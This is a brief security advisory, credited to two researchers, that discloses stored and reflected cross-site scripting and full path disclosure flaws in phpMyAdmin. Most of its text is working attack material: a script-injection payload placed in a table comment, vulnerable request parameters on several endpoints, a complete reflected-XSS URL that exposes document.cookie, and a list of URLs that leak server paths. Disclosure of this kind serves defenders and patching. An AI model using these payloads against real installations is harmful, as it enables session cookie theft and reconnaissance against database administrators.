phpmyadmin.txt

`vendor site:http://phpmyadmin.net/  
product:PhpMyAdmin all version  
bug: xss permanent & full path disclosure  
global risk:high  
  
  
  
xss post :  
1) create a table , with whatever name , when it's done , go to "operation"   
(/db_operations.php) and add a comment on your table with:  
</textarea>'"><script>alert(document.cookie)</script>  
( the "alert" is only to show the xss is working ...)  
this is a serious security issue , because it's a permanent xss , when you get into phpmyadmin   
you will get your cookie stealed directly , without looking at the attacker_table.  
  
2)  
/phpmyadmin/db_create.php  
variables :  
token=your_token&reload=1&db=[double xss(2 followed xss)]  
  
3)  
/phpmyadmin/db_operations.php  
variables:  
db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]  
  
4)  
/phpmyadmin/querywindow.php   
token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]  
querydisplay_tab   
  
xss get :  
http://site.com/phpmyadmin/sql.php?db=information_schema&token=your_token&goto=db_details_structure.php&table=CHARACTER_SETS&pos=</textarea>'"><script>alert(document.cookie)</script>  
  
Note: if there's a "token=" on this string ,it's because you need it , so replace this one with yours .  
  
full path disclosure :  
/scripts/check_lang.php  
/themes/darkblue_orange/layout.inc.php  
/index.php?lang[]=  
/index.php?target[]=  
/index.php?db[]=  
/index.php?goto[]=  
/left.php?server[]=  
/index.php?table[]=  
/server_databases.php?token=your_token&sort_by="  
/index.php?db=information_schema&token=your_token&tbl_group[]=  
/db_printview.php?db="  
/sql.php?back[]=  
  
  
  
laurent gaffié & benjamin mossé  
http://s-a-p.ca/  
contact: [email protected]  
`